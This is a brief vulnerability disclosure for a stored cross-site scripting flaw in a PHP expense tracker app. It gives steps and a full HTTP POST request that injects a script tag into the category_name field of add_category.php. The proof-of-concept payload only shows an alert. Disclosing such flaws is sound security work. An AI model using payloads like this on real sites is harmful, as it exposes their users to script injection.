XSS Stored (Expense Tracker App Using PHP with Source Code)
23/09/2023
Xcode0x (Mohamed Almarri)
Twitter: @xcode0x
https://www.sourcecodester.com/users/remyandrade
https://www.sourcecodester.com/php/16794/simple-expense-tracker-app-using-php-source-code.html
v1
debian
Expense Tracker App v1 is vulnerable to Cross Site Scripting (XSS) via add category .
1- add category
2- in category_name put your payload
POST /simple-expense-tracker-app/endpoint/add_category.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/simple-expense-tracker-app/
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Origin: http://localhost
Connection: close
Upgrade-Insecure-Requests: 1
tbl_expense_category_id=&category_name=<script>alert('By:Xcode0x')</script>&category_budget=1
Linux - debian